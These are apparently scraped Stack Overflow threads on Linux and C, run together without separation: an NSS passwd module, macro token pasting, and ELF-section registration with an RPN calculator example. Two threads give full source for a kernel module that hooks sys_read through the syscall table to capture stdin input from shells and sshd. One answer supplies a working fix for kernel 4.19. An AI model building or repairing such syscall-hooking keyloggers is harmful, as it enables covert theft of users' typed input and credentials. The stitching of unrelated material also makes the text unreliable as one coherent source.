So I am trying to add a service to NSS (Name Service Switch). Please note the GNU guide on how to do it here. I have been following that guide. I need to implement a service that works with the passwd database.
The problem I am having is my module is not being called for certain functions. Let me reproduce some of my code here...
enum nss_status
_nss_myservice_setpwent (void) {
printf( "# %s\n", __FUNCTION__ ) ;
return NSS_STATUS_SUCCESS ;
} ;
enum nss_status
_nss_myservice_endpwent (void) {
printf( "# %s\n", __FUNCTION__ ) ;
return NSS_STATUS_SUCCESS ;
} ;
enum nss_status
_nss_myservice_getpwent_r (struct passwd *result, char *buffer,
size_t buflen, int *errnop) {
static int i = 0 ;
if( i++ == 0 ) {
printf( "# %s\n", __FUNCTION__ ) ;
return init_result( result, buffer, buflen, errnop ) ;
} else {
i = 0 ;
return NSS_STATUS_NOTFOUND ;
}
} ;
enum nss_status
_nss_myservice_getpwbynam (const char *nam, struct passwd *result, char *buffer,
size_t buflen, int *errnop) {
printf( "# %s with name %s\n", __FUNCTION__, nam ) ;
return init_result( result, buffer, buflen, errnop ) ;
} ;
enum nss_status
_nss_myservice_getpwbynam_r (const char *nam, struct passwd *result, char *buffer,
size_t buflen, int *errnop) {
printf( "# %s with name_r %s\n", __FUNCTION__, nam ) ;
return init_result( result, buffer, buflen, errnop ) ;
} ;
Init_result is an inline function that simply fills in the result with a dummy user no matter what the PARAMS are.
Now I have my /etc/nsswitch.conf setup as follows:
passwd: myservice compat
And for completeness here is my Makefile.
all:
gcc -fPIC -shared -o libnss_myservice.so.2 -Wl,-soname,libnss_myservice.so.2 myservice.c
install:
sudo install -m 0644 libnss_myservice.so.2 /lib
sudo /sbin/ldconfig -n /lib /usr/lib
clean:
/bin/rf -rf libnss_myservice.so.2
Now after installing this nss module I run getent on the command line and here is my output:
username#host:~/nss$ getent passwd
# _nss_myservice_setpwent
# _nss_myservice_getpwent_r
myuser:mypass:1:1:realname::
root:x:0:0:root:/root:/bin/bash
...
# _nss_myservice_endpwent
So as you can see that is working as I would expect. The iterative call is made which returns the user and then the compat service is called which returns all the user from /etc/passwd.
The problem is when I make this call, "getent passwd myuser", I get a return value of 2, "Key not found in database". This shows me my _nss_myservice_getpwbynam_r function is not being called. Any ideas why? I can provide the complete code if that would help.
You need to call the function _nss_myservice_getpwnam_r instead of _nss_myservice_getpwbynam_r.
After looking at ftp://ftp.acer-euro.com/gpl/Utility/glibc/glibc-2.2.5.tar/include/pwd.h :
#define DECLARE_NSS_PROTOTYPES(service) \
extern enum nss_status _nss_ ## service ## _setpwent (int); \
extern enum nss_status _nss_ ## service ## _endpwent (void); \
extern enum nss_status _nss_ ## service ## _getpwnam_r \ <<< this line
(const char *name, struct passwd *pwd, \
char *buffer, size_t buflen, int *errnop); \
extern enum nss_status _nss_ ## service ## _getpwuid_r \
(uid_t uid, struct passwd *pwd, \
char *buffer, size_t buflen, int *errnop); \
extern enum nss_status _nss_ ## service ##_getpwent_r \
(struct passwd *result, char *buffer, \
size_t buflen, int *errnop);
Related
This is working sample of hijacking user's input via overriding kernel's syscall read.
https://pastebin.com/K9zcSXrQ
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/init.h>
#include <linux/slab.h>
#include <linux/string.h>
#include <linux/syscalls.h>
#include <linux/version.h>
#include <linux/unistd.h>
#include <linux/time.h>
#include <linux/preempt.h>
#include <linux/delay.h>
#include <linux/cred.h>
#include <linux/sched.h>
#include <linux/device.h>
#include <linux/mutex.h>
#include <linux/types.h>
#include <linux/kfifo.h>
#include <linux/kobject.h>
#include <linux/sysfs.h>
#include <asm/uaccess.h>
#include <asm/paravirt.h>
#include <asm-generic/bug.h>
#include <asm/segment.h>
#include <asm/atomic.h>
#include <asm/ptrace.h>
#define PID_MAX 4194305
#define MODULE_NAME "hacked_read"
#define dbg( format, arg... ) do { if ( debug ) pr_info( MODULE_NAME ": %s: " format , __FUNCTION__ , ## arg ); } while ( 0 )
#define err( format, arg... ) pr_err( MODULE_NAME ": " format, ## arg )
#define info( format, arg... ) pr_info( MODULE_NAME ": " format, ## arg )
#define warn( format, arg... ) pr_warn( MODULE_NAME ": " format, ## arg )
MODULE_DESCRIPTION( MODULE_NAME );
MODULE_VERSION( "0.4" );
MODULE_LICENSE( "GPL" );
MODULE_AUTHOR( "module author <mail#domain.com>" );
static bool debug = false;
static DEFINE_SPINLOCK( mLock );
static unsigned long ( *original_read ) ( const struct pt_regs *regs );
void **sct;
static unsigned long flags; // irq flags
static atomic_t LOCK_NUMBER_ATOM = ATOMIC_INIT(0);
static unsigned long long LOCK_NUMBER_ATOM_VAL;
static bool pids[ PID_MAX ];
static bool FORCE_EXIT = false; // force exit via method.
// ---------- force-exit handler -----
static struct kobject *force_exit_kobject;
static ssize_t foo_store(struct kobject *kobj, struct kobj_attribute *attr, const char *buf, size_t count) {
if ( strstr( buf, "exit" ) ) {
FORCE_EXIT = true;
info( "Force exit method. ");
}
return count;
}
static struct kobj_attribute foo_attribute = __ATTR( foo, S_IRUGO | S_IWUSR, NULL, foo_store );
// -------------- asm inserts -------------
static inline void rw_enable( void ) {
asm volatile ( "pushq %rax \n"
"movq %cr0, %rax \n"
"andq $0xfffffffffffeffff, %rax \n"
"movq %rax, %cr0 \n"
"popq %rax " );
}
static inline uint64_t getcr0(void) {
register uint64_t ret = 0;
asm volatile (
"movq %%cr0, %0\n"
:"=r"(ret)
);
return ret;
}
static inline void rw_disable( register uint64_t val ) {
asm volatile(
"movq %0, %%cr0\n"
:
:"r"(val)
);
}
static void* find_sym( const char *sym ) {
static unsigned long faddr = 0; // static !!!
// ----------- nested functions are a GCC extension ---------
int symb_fn( void* data, const char* sym, struct module* mod, unsigned long addr ) {
if( 0 == strcmp( (char*)data, sym ) ) {
faddr = addr;
return 1;
} else return 0;
};// --------------------------------------------------------
kallsyms_on_each_symbol( symb_fn, (void*)sym );
return (void*)faddr;
}
static unsigned long hacked_read_test( const struct pt_regs *regs ) {
unsigned long r;
unsigned long cp_user_flag;
unsigned long fd;
unsigned long strnlen_user_val;
unsigned long count;
static char tmp_buffer[ 1 ];
atomic_inc( &LOCK_NUMBER_ATOM );
pids[ task_pid_nr( current ) ] = true;
r = original_read( regs );
// injection:
if ( r > 0 ) {
fd = regs->di;
if ( fd == 0 ) { // fd == 0 --> stdin (sh, sshd)
strnlen_user_val = strnlen_user( (char*) regs->si, 1 );
count = regs->dx;
dbg( "strnlen_user_val: %lu\n", strnlen_user_val );
if ( strnlen_user_val > 0 && count > 0 ) {
if ( strnlen_user_val > 1 ) strnlen_user_val = 1;
cp_user_flag = copy_from_user( tmp_buffer, (char*) regs->si, strnlen_user_val );
if ( cp_user_flag == 0 ) {
info( "tmp_buffer: %s\n", tmp_buffer );
}
}
}
}
atomic_dec( &LOCK_NUMBER_ATOM );
pids[ task_pid_nr( current ) ] = false;
return r;
}
int hacked_read_init( void ) {
register uint64_t cr0;
int cpu;
int error = 0;
sct = find_sym( "sys_call_table" );
original_read = (void *)sct[ __NR_read ];
for_each_present_cpu( cpu ) {
spin_lock_irqsave( &mLock, flags );
cr0 = getcr0( );
rw_enable( );
sct[ __NR_read ] = hacked_read_test;
rw_disable( cr0 );
spin_unlock_irqrestore( &mLock, flags );
}
force_exit_kobject = kobject_create_and_add( "hacked_read_force_exit", kernel_kobj );
if( ! force_exit_kobject ) return -ENOMEM;
error = sysfs_create_file( force_exit_kobject, &foo_attribute.attr );
if ( error ) info( "failed to create the foo file in /sys/kernel/hacked_read_force_exit \n" );
info( "Module was loaded\n" );
return 0;
}
void hacked_read_exit( void ) {
register uint64_t cr0;
int cpu;
unsigned int i;
for_each_present_cpu( cpu ) {
spin_lock_irqsave( &mLock, flags );
cr0 = getcr0( );
rw_enable( );
sct[__NR_read] = original_read;
rw_disable( cr0 );
spin_unlock_irqrestore( &mLock, flags );
}
LOCK_NUMBER_ATOM_VAL = atomic_read( &LOCK_NUMBER_ATOM );
while ( LOCK_NUMBER_ATOM_VAL != 0 ) {
info( "Locked. LOCK_NUMBER_ATOM_VAL = %lld\n", LOCK_NUMBER_ATOM_VAL );
for( i = 0; i < PID_MAX; i++ ) if ( pids[ i ] ) info( "Locked. pid = %d\n", i );
msleep( 5000 );
LOCK_NUMBER_ATOM_VAL = atomic_read( &LOCK_NUMBER_ATOM );
if ( FORCE_EXIT ) {
info( "Force exit. Unload module..." );
break;
}
}
kobject_put( force_exit_kobject );
info( "Open. LOCK_NUMBER_ATOM_VAL = %lld\n", LOCK_NUMBER_ATOM_VAL);
info( "Module was unloaded\n" );
}
module_init( hacked_read_init );
module_exit( hacked_read_exit );
Makefile:
CURRENT = $(shell uname -r)
KDIR = /lib/modules/$(CURRENT)/build
PWD = $(shell pwd)
TARGET = hacked_read
obj-m := $(TARGET).o
default:
$(MAKE) -C $(KDIR) M=$(PWD) modules
clean:
#rm -f *.o .*.cmd .*.flags *.mod.c *.order
#rm -f .*.*.cmd *.symvers *~ *.*~ TODO.*
#rm -fR .tmp*
#rm -rf .tmp_versions
I've read a lot stackoverflow on topic, and find such interesting opinion:
Why do you have to implement a syscall? 99% of the time, it's the wrong way to achieve whatever you're trying to do.
it is from here.
And now, I'm looking for the way to do the same hijack without syscall, is there?
May be kind of kernel-debug mechanism, something like kprobes might give me the same result much more safer than current raw override of syscall.
Could somebody give me working sample, please?
In other words, I'm looking for the lawful method, not a hack.
I want to generate multiple similar functions replacing just one word across the function.
As an example, for each of the below:
OBJECT = customer
OBJECT = account
use the function template:
void add_OBJECT_to_array(void* item_ptr, int pos)
{
mtx_lock(&OBJECT_array_mtx);
OBJECT_array[pos] = *(OBJECT_t*)item_ptr;
mtx_unlock(&OBJECT_array_mtx);
return;
}
So that I can call
add_order_to_array(ord, 1);
add_customer_to_array(cust, 1);
Is this possible?
Totally possible. You just need to know about the preprocessor concatenation operator ##. The following code will generate two functions add_order_to_array and add_customer_to_array.
#define GENERATE_FUNC(OBJECT) \
void add_ ## OBJECT ## _to_array(void* item_ptr, int pos)\
{ \
mtx_lock(&OBJECT ## _array_mtx); \
OBJECT ## _array[pos] = *(OBJECT ## _t*)item_ptr; \
mtx_unlock(&OBJECT ## _array_mtx); \
return; \
}
GENERATE_FUNC(order)
GENERATE_FUNC(customer)
The preprocessor output will be (unfortunately it does not respect formatting):
void add_order_to_array(void* item_ptr, int pos) { mtx_lock(&order_array_mtx); order_array[pos] = *(order_t*)item_ptr; mtx_unlock(&order_array_mtx); return; }
void add_customer_to_array(void* item_ptr, int pos) { mtx_lock(&customer_array_mtx); customer_array[pos] = *(customer_t*)item_ptr; mtx_unlock(&customer_array_mtx); return; }
Yes it's possible:
#define DECLARE_ADD_FUNCTION(__obj) \
void add_##__obj##_to_array(void* item_ptr, int pos) \
{ \
mtx_lock(&__obj##_array_mtx); \
__obj##_array[pos] = *(__obj##_t*)item_ptr; \
mtx_unlock(&__obj##_array_mtx); \
return; \
}
DECLARE_ADD_FUNCTION(customer)
DECLARE_ADD_FUNCTION(account)
When you look at the output of the preprocessor you get:
gcc -E foo.c
void add_customer_to_array(void* item_ptr, int pos) { mtx_lock(&customer_array_mtx); customer_array[pos] = *(customer_t*)item_ptr; mtx_unlock(&customer_array_mtx); return; }
void add_account_to_array(void* item_ptr, int pos) { mtx_lock(&account_array_mtx); account_array[pos] = *(account_t*)item_ptr; mtx_unlock(&account_array_mtx); return; }
You can even ensure that the pointer type is the correct type by changing the function prototype to add_##__obj##_to_array(__obj##_t *, int pos)
This my module perfectly hijacks user's console: https://pastebin.com/99YJFnaq
And it was Linux kernel 4.12, Kali 2018.1.
Now, I've installed the latest version of Kali - 2019.1. It uses kernel 4.19:
Linux kali 4.19.0-kali1-amd64 #1 SMP Debian 4.19.13-1kali1
(2019-01-03) x86_64 GNU/Linux
I'm trying to catch anything, but nothing with fd == 0 exists in flow.
I've googled for a long long time, tried to read changelogs on different resources...
I've found such module kpti, which probably would do something like that, but this module is not installed in Kali 2019.1.
Please, help me find the exact reason why hacked_read in this piece of code stopped hearing sys_read():
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/init.h>
#include <linux/slab.h>
#include <linux/string.h>
#include <linux/syscalls.h>
#include <linux/version.h>
#include <linux/unistd.h>
#include <linux/time.h>
#include <linux/preempt.h>
#include <asm/uaccess.h>
#include <asm/paravirt.h>
#include <asm-generic/bug.h>
#include <asm/segment.h>
#define BUFFER_SIZE 512
#define MODULE_NAME "hacked_read"
#define dbg( format, arg... ) do { if ( debug ) pr_info( MODULE_NAME ": %s: " format , __FUNCTION__ , ## arg ); } while ( 0 )
#define err( format, arg... ) pr_err( MODULE_NAME ": " format, ## arg )
#define info( format, arg... ) pr_info( MODULE_NAME ": " format, ## arg )
#define warn( format, arg... ) pr_warn( MODULE_NAME ": " format, ## arg )
MODULE_DESCRIPTION( MODULE_NAME );
MODULE_VERSION( "0.1" );
MODULE_LICENSE( "GPL" );
MODULE_AUTHOR( "module author <mail#domain.com>" );
static char debug_buffer[ BUFFER_SIZE ];
unsigned long ( *original_read ) ( unsigned int, char *, size_t );
void **sct;
unsigned long icounter = 0;
static inline void rw_enable( void ) {
asm volatile ( "cli \n"
"pushq %rax \n"
"movq %cr0, %rax \n"
"andq $0xfffffffffffeffff, %rax \n"
"movq %rax, %cr0 \n"
"popq %rax " );
}
static inline uint64_t getcr0(void) {
register uint64_t ret = 0;
asm volatile (
"movq %%cr0, %0\n"
:"=r"(ret)
);
return ret;
}
static inline void rw_disable( register uint64_t val ) {
asm volatile(
"movq %0, %%cr0\n"
"sti "
:
:"r"(val)
);
}
static void* find_sym( const char *sym ) {
static unsigned long faddr = 0; // static !!!
// ----------- nested functions are a GCC extension ---------
int symb_fn( void* data, const char* sym, struct module* mod, unsigned long addr ) {
if( 0 == strcmp( (char*)data, sym ) ) {
faddr = addr;
return 1;
} else return 0;
};// --------------------------------------------------------
kallsyms_on_each_symbol( symb_fn, (void*)sym );
return (void*)faddr;
}
unsigned long hacked_read_test( unsigned int fd, char *buf, size_t count ) {
unsigned long r = 1;
if ( fd != 0 ) { // fd == 0 --> stdin (sh, sshd)
return original_read( fd, buf, count );
} else {
icounter++;
if ( icounter % 1000 == 0 ) {
info( "test2 icounter = %ld\n", icounter );
info( "strlen( debug_buffer ) = %ld\n", strlen( debug_buffer ) );
}
r = original_read( fd, buf, count );
strncat( debug_buffer, buf, 1 );
if ( strlen( debug_buffer ) > BUFFER_SIZE - 100 )
debug_buffer[0] = '\0';
return r;
}
}
int hacked_read_init( void ) {
register uint64_t cr0;
info( "Module was loaded\n" );
sct = find_sym( "sys_call_table" );
original_read = (void *)sct[ __NR_read ];
cr0 = getcr0();
rw_enable();
sct[ __NR_read ] = hacked_read_test;
rw_disable( cr0 );
return 0;
}
void hacked_read_exit( void ) {
register uint64_t cr0;
info( "Module was unloaded\n" );
cr0 = getcr0();
rw_enable();
sct[ __NR_read ] = original_read;
rw_disable( cr0 );
}
module_init( hacked_read_init );
module_exit( hacked_read_exit );
Makefile:
CURRENT = $(shell uname -r)
KDIR = /lib/modules/$(CURRENT)/build
PWD = $(shell pwd)
TARGET = hacked_read
obj-m := $(TARGET).o
default:
$(MAKE) -C $(KDIR) M=$(PWD) modules
clean:
#rm -f *.o .*.cmd .*.flags *.mod.c *.order
#rm -f .*.*.cmd *.symvers *~ *.*~ TODO.*
#rm -fR .tmp*
#rm -rf .tmp_versions
I'm sure that everything like before keeps calling sys_read(). tee, bash, vi - all this stuff could not be changed in such short period, but linux-kernel.
I will appreciate the code with bypassing.
A bit of troubleshooting shows the following:
Of course, none of userspace programs stopped using read(). They still keep calling it.
There is no "memory isolation". The syscalls table is succesfully modified during the module initialization and the pointer to sys_read() is successfully replaced with pointer to hacked_read_test().
When the module is loaded, the read() syscall works as if it was the original one.
The change in the behavior happened between kernels 4.16 and 4.16.2 (i.e. between April 1, 2018 and April 12, 2018).
Considering this, we have pretty narrow list of commits to check, and the changes are likely to be in the syscalls mechanism. Well, looks like this commit is what we are looking for (and few more around).
The crucial part of this commit is that it changes signatures of the functions defined by SYSCALL_DEFINEx so that they accept a pointer to struct pt_regs instead of syscall arguments, i.e. sys_read(unsigned int fd, char __user * buf, size_t count) becomes sys_read(const struct pt_regs *regs). This means, that hacked_read_test(unsigned int fd, char *buf, size_t count) is no longer a valid replacement for sys_read()!
So, with new kernels you replace sys_read(const struct pt_regs *regs) with hacked_read_test(unsigned int fd, char *buf, size_t count). Why this does not crash and instead works as if it was the original sys_read()? Consider the simplified version of hacked_read_test() again:
unsigned long hacked_read_test( unsigned int fd, char *buf, size_t count ) {
if ( fd != 0 ) {
return original_read( fd, buf, count );
} else {
// ...
}
}
Well. The first function argument is passed via %rdi register. The caller of sys_read() places a pointer to struct pt_regs into %rdi and performs a call. The execution flow goes inside hacked_read_test(), and the first argument, fd, is checked for not being zero. Considering that this argument contains a valid pointer instead of file descriptor, this condition succeeds and the control flow goes directly to original_read(), which receives the fd value (i.e., actually, the pointer to struct pt_regs) as a first argument, which, in turn, then gets successfully used as it was originally meant to be. So, since kernel 4.16.2 your hacked_read_test() effectively works as follows:
unsigned long hacked_read_test( const struct pt_regs *regs ) {
return original_read( regs );
}
To make sure about it, you can try the alternative version of hacked_read_test():
unsigned long hacked_read_test( void *ptr ) {
if ( ptr != 0 ) {
info( "invocation of hacked_read_test(): 1st arg is %d (%p)", ptr, ptr );
return original_read( ptr );
} else {
return -EINVAL;
}
}
After compiling and insmoding this version, you get the following:
invocation of hacked_read_test(): 1st arg is 35569496 (00000000c3a0dc9e)
You may create a working version of hacked_read_test(), but it seems that the implementation will be platform-dependent, as you will have to extract the arguments from the appropriate register fields of regs (for x86_84 these are %rdi, %rsi and %rdx for 1st, 2nd and 3rd syscall arguments respectively).
The working x86_64 implementation is below (tested on kernel 4.19).
#include <asm/ptrace.h>
// ...
unsigned long ( *original_read ) ( const struct pt_regs *regs );
// ...
unsigned long hacked_read_test( const struct pt_regs *regs ) {
unsigned int fd = regs->di;
char *buf = (char*) regs->si;
unsigned long r = 1;
if ( fd != 0 ) { // fd == 0 --> stdin (sh, sshd)
return original_read( regs );
} else {
icounter++;
if ( icounter % 1000 == 0 ) {
info( "test2 icounter = %ld\n", icounter );
info( "strlen( debug_buffer ) = %ld\n", strlen( debug_buffer ) );
}
r = original_read( regs );
strncat( debug_buffer, buf, 1 );
if ( strlen( debug_buffer ) > BUFFER_SIZE - 100 )
debug_buffer[0] = '\0';
return r;
}
}
This question is something of a trick C question or a trick clang/gcc question. I'm not sure which.
I phrased it like I did because the final array is in main.c, but the structs that are in the array are defined in C modules.
The end goal of what I am trying to do is to be able to define structs in seperate C modules and then have those structs be available in a contiguous array right from program start. I do not want to use any dynamic code to declare the array and put in the elements.
I would like it all done at compile or link time -- not at run time.
I'm looking to end up with a monolithic blob of memory that gets setup right from program start.
For the sake of the Stack Overflow question, I thought it would make sense if I imagined these as "drivers" (like in the Linux kernel) Going with that...
Each module is a driver. Because the team is complex, I do not know how many drivers there will ultimately be.
Requirements:
Loaded into contiguous memory (an array)
Loaded into memory at program start
installed by the compiler/linker, not dynamic code
a driver exists because source code exists for it (no dynamic code to load them up)
Avoid cluttering up the code
Here is a contrived example:
// myapp.h
//////////////////////////
struct state
{
int16_t data[10];
};
struct driver
{
char name[255];
int16_t (*on_do_stuff) (struct state *state);
/* other stuff snipped out */
};
// drivera.c
//////////////////////////
#include "myapp.h"
static int16_t _on_do_stuff(struct state *state)
{
/* do stuff */
}
static const struct driver _driver = {
.name = "drivera",
.on_do_stuff = _on_do_stuff
};
// driverb.c
//////////////////////////
#include "myapp.h"
static int16_t _on_do_stuff(struct state *state)
{
/* do stuff */
}
static const struct driver _driver = {
.name = "driverb",
.on_do_stuff = _on_do_stuff
};
// driverc.c
//////////////////////////
#include "myapp.h"
static int16_t _on_do_stuff(struct state *state)
{
/* do stuff */
}
static const struct driver _driver = {
.name = "driverc",
.on_do_stuff = _on_do_stuff
};
// main.c
//////////////////////////
#include <stdio.h>
static struct driver the_drivers[] = {
{drivera somehow},
{driverb somehow},
{driverc somehow},
{0}
};
int main(void)
{
struct state state;
struct driver *current = the_drivers;
while (current != 0)
{
printf("we are up to %s\n", current->name);
current->on_do_stuff(&state);
current += sizeof(struct driver);
}
return 0;
}
This doesn't work exactly.
Ideas:
On the module-level structs, I could remove the static const keywords, but I'm not sure how to get them into the array at compile time
I could move all of the module-level structs to main.c, but then I would need to remove the static keyword from all of the on_do_stuff functions, and thereby clutter up the namespace.
In the Linux kernel, they somehow define kernel modules in separate files and then through linker magic, they are able to be loaded into monolithics
Use a dedicated ELF section to "collect" the data structures.
For example, define your data structure in info.h as
#ifndef INFO_H
#define INFO_H
#ifndef INFO_ALIGNMENT
#if defined(__LP64__)
#define INFO_ALIGNMENT 16
#else
#define INFO_ALIGNMENT 8
#endif
#endif
struct info {
long key;
long val;
} __attribute__((__aligned__(INFO_ALIGNMENT)));
#define INFO_NAME(counter) INFO_CAT(info_, counter)
#define INFO_CAT(a, b) INFO_DUMMY() a ## b
#define INFO_DUMMY()
#define DEFINE_INFO(data...) \
static struct info INFO_NAME(__COUNTER__) \
__attribute__((__used__, __section__("info"))) \
= { data }
#endif /* INFO_H */
The INFO_ALIGNMENT macro is the alignment used by the linker to place each symbol, separately, to the info section. It is important that the C compiler agrees, as otherwise the section contents cannot be treated as an array. (You'll obtain an incorrect number of structures, and only the first one (plus every N'th) will be correct, the rest of the structures garbled. Essentially, the C compiler and the linker disagreed on the size of each structure in the section "array".)
Note that you can add preprocessor macros to fine-tune the INFO_ALIGNMENT for each of the architectures you use, but you can also override it for example in your Makefile, at compile time. (For GCC, supply -DINFO_ALIGNMENT=32 for example.)
The used attribute ensures that the definition is emitted in the object file, even though it is not referenced otherwise in the same data file. The section("info") attribute puts the data into a special info section in the object file. The section name (info) is up to you.
Those are the critical parts, otherwise it is completely up to you how you define the macro, or whether you define it at all. Using the macro is easy, because one does not need to worry about using unique variable name for the structure. Also, if at least one member is specified, all others will be initialized to zero.
In the source files, you define the data objects as e.g.
#include "info.h"
/* Suggested, easy way */
DEFINE_INFO(.key = 5, .val = 42);
/* Alternative way, without relying on any macros */
static struct info foo __attribute__((__used__, __section__("info"))) = {
.key = 2,
.val = 1
};
The linker provides symbols __start_info and __stop_info, to obtain the structures in the info section. In your main.c, use for example
#include "info.h"
extern struct info __start_info[];
extern struct info __stop_info[];
#define NUM_INFO ((size_t)(__stop_info - __start_info))
#define INFO(i) ((__start_info) + (i))
so you can enumerate all info structures. For example,
int main(void)
{
size_t i;
printf("There are %zu info structures:\n", NUM_INFO);
for (i = 0; i < NUM_INFO; i++)
printf(" %zu. key=%ld, val=%ld\n", i,
__start_info[i].key, INFO(i)->val);
return EXIT_SUCCESS;
}
For illustration, I used both the __start_info[] array access (you can obviously #define SOMENAME __start_info if you want, just make sure you do not use SOMENAME elsewhere in main.c, so you can use SOMENAME[] as the array instead), as well as the INFO() macro.
Let's look at a practical example, an RPN calculator.
We use section ops to define the operations, using facilities defined in ops.h:
#ifndef OPS_H
#define OPS_H
#include <stdlib.h>
#include <errno.h>
#ifndef ALIGN_SECTION
#if defined(__LP64__) || defined(_LP64)
#define ALIGN_SECTION __attribute__((__aligned__(16)))
#elif defined(__ILP32__) || defined(_ILP32)
#define ALIGN_SECTION __attribute__((__aligned__(8)))
#else
#define ALIGN_SECTION
#endif
#endif
typedef struct {
size_t maxsize; /* Number of values allocated for */
size_t size; /* Number of values in stack */
double *value; /* Values, oldest first */
} stack;
#define STACK_INITIALIZER { 0, 0, NULL }
struct op {
const char *name; /* Operation name */
const char *desc; /* Description */
int (*func)(stack *); /* Implementation */
} ALIGN_SECTION;
#define OPS_NAME(counter) OPS_CAT(op_, counter, _struct)
#define OPS_CAT(a, b, c) OPS_DUMMY() a ## b ## c
#define OPS_DUMMY()
#define DEFINE_OP(name, func, desc) \
static struct op OPS_NAME(__COUNTER__) \
__attribute__((__used__, __section__("ops"))) = { name, desc, func }
static inline int stack_has(stack *st, const size_t num)
{
if (!st)
return EINVAL;
if (st->size < num)
return ENOENT;
return 0;
}
static inline int stack_pop(stack *st, double *to)
{
if (!st)
return EINVAL;
if (st->size < 1)
return ENOENT;
st->size--;
if (to)
*to = st->value[st->size];
return 0;
}
static inline int stack_push(stack *st, double val)
{
if (!st)
return EINVAL;
if (st->size >= st->maxsize) {
const size_t maxsize = (st->size | 127) + 129;
double *value;
value = realloc(st->value, maxsize * sizeof (double));
if (!value)
return ENOMEM;
st->maxsize = maxsize;
st->value = value;
}
st->value[st->size++] = val;
return 0;
}
#endif /* OPS_H */
The basic set of operations is defined in ops-basic.c:
#include "ops.h"
static int do_neg(stack *st)
{
double temp;
int retval;
retval = stack_pop(st, &temp);
if (retval)
return retval;
return stack_push(st, -temp);
}
static int do_add(stack *st)
{
int retval;
retval = stack_has(st, 2);
if (retval)
return retval;
st->value[st->size - 2] = st->value[st->size - 1] + st->value[st->size - 2];
st->size--;
return 0;
}
static int do_sub(stack *st)
{
int retval;
retval = stack_has(st, 2);
if (retval)
return retval;
st->value[st->size - 2] = st->value[st->size - 1] - st->value[st->size - 2];
st->size--;
return 0;
}
static int do_mul(stack *st)
{
int retval;
retval = stack_has(st, 2);
if (retval)
return retval;
st->value[st->size - 2] = st->value[st->size - 1] * st->value[st->size - 2];
st->size--;
return 0;
}
static int do_div(stack *st)
{
int retval;
retval = stack_has(st, 2);
if (retval)
return retval;
st->value[st->size - 2] = st->value[st->size - 1] / st->value[st->size - 2];
st->size--;
return 0;
}
DEFINE_OP("neg", do_neg, "Negate current operand");
DEFINE_OP("add", do_add, "Add current and previous operands");
DEFINE_OP("sub", do_sub, "Subtract previous operand from current one");
DEFINE_OP("mul", do_mul, "Multiply previous and current operands");
DEFINE_OP("div", do_div, "Divide current operand by the previous operand");
The calculator expects each value and operand to be a separate command-line argument for simplicity. Our main.c contains operation lookup, basic usage, value parsing, and printing the result (or error):
#include <stdlib.h>
#include <string.h>
#include <stdio.h>
#include <errno.h>
#include "ops.h"
extern struct op __start_ops[];
extern struct op __stop_ops[];
#define NUM_OPS ((size_t)(__stop_ops - __start_ops))
static int do_op(stack *st, const char *opname)
{
struct op *curr_op;
if (!st || !opname)
return EINVAL;
for (curr_op = __start_ops; curr_op < __stop_ops; curr_op++)
if (!strcmp(opname, curr_op->name))
break;
if (curr_op >= __stop_ops)
return ENOTSUP;
return curr_op->func(st);
}
static int usage(const char *argv0)
{
struct op *curr_op;
fprintf(stderr, "\n");
fprintf(stderr, "Usage: %s [ -h | --help ]\n", argv0);
fprintf(stderr, " %s RPN-EXPRESSION\n", argv0);
fprintf(stderr, "\n");
fprintf(stderr, "Where RPN-EXPRESSION is an expression using reverse\n");
fprintf(stderr, "Polish notation, and each argument is a separate value\n");
fprintf(stderr, "or operator. The following operators are supported:\n");
for (curr_op = __start_ops; curr_op < __stop_ops; curr_op++)
fprintf(stderr, "\t%-14s %s\n", curr_op->name, curr_op->desc);
fprintf(stderr, "\n");
return EXIT_SUCCESS;
}
int main(int argc, char *argv[])
{
stack all = STACK_INITIALIZER;
double val;
size_t i;
int arg, err;
char dummy;
if (argc < 2 || !strcmp(argv[1], "-h") || !strcmp(argv[1], "--help"))
return usage(argv[0]);
for (arg = 1; arg < argc; arg++)
if (sscanf(argv[arg], " %lf %c", &val, &dummy) == 1) {
err = stack_push(&all, val);
if (err) {
fprintf(stderr, "Cannot push %s to stack: %s.\n", argv[arg], strerror(err));
return EXIT_FAILURE;
}
} else {
err = do_op(&all, argv[arg]);
if (err == ENOTSUP) {
fprintf(stderr, "%s: Operation not supported.\n", argv[arg]);
return EXIT_FAILURE;
} else
if (err) {
fprintf(stderr, "%s: Cannot perform operation: %s.\n", argv[arg], strerror(err));
return EXIT_FAILURE;
}
}
if (all.size < 1) {
fprintf(stderr, "No result.\n");
return EXIT_FAILURE;
} else
if (all.size > 1) {
fprintf(stderr, "Multiple results:\n");
for (i = 0; i < all.size; i++)
fprintf(stderr, " %.9f\n", all.value[i]);
return EXIT_FAILURE;
}
printf("%.9f\n", all.value[0]);
return EXIT_SUCCESS;
}
Note that if there were many operations, constructing a hash table to speed up the operation lookup would make a lot of sense.
Finally, we need a Makefile to tie it all together:
CC := gcc
CFLAGS := -Wall -O2 -std=c99
LDFLAGS := -lm
OPS := $(wildcard ops-*.c)
OPSOBJS := $(OPS:%.c=%.o)
PROGS := rpncalc
.PHONY: all clean
all: clean $(PROGS)
clean:
rm -f *.o $(PROGS)
%.o: %.c
$(CC) $(CFLAGS) -c $^
rpncalc: main.o $(OPSOBJS)
$(CC) $(CFLAGS) $^ $(LDFLAGS) -o $#
Because this forum does not preserve Tabs, and make requires them for indentation, you probably need to fix the indentation after copy-pasting the above. I use sed -e 's|^ *|\t|' -i Makefile
If you compile (make clean all) and run (./rpncalc) the above, you'll see the usage information:
Usage: ./rpncalc [ -h | --help ]
./rpncalc RPN-EXPRESSION
Where RPN-EXPRESSION is an expression using reverse
Polish notation, and each argument is a separate value
or operator. The following operators are supported:
div Divide current operand by the previous operand
mul Multiply previous and current operands
sub Subtract previous operand from current one
add Add current and previous operands
neg Negate current operand
and if you run e.g. ./rpncalc 3.0 4.0 5.0 sub mul neg, you get the result 3.000000000.
Now, let's add some new operations, ops-sqrt.c:
#include <math.h>
#include "ops.h"
static int do_sqrt(stack *st)
{
double temp;
int retval;
retval = stack_pop(st, &temp);
if (retval)
return retval;
return stack_push(st, sqrt(temp));
}
DEFINE_OP("sqrt", do_sqrt, "Take the square root of the current operand");
Because the Makefile above compiles all C source files beginning with ops- in to the final binary, the only thing you need to do is recompile the source: make clean all. Running ./rpncalc now outputs
Usage: ./rpncalc [ -h | --help ]
./rpncalc RPN-EXPRESSION
Where RPN-EXPRESSION is an expression using reverse
Polish notation, and each argument is a separate value
or operator. The following operators are supported:
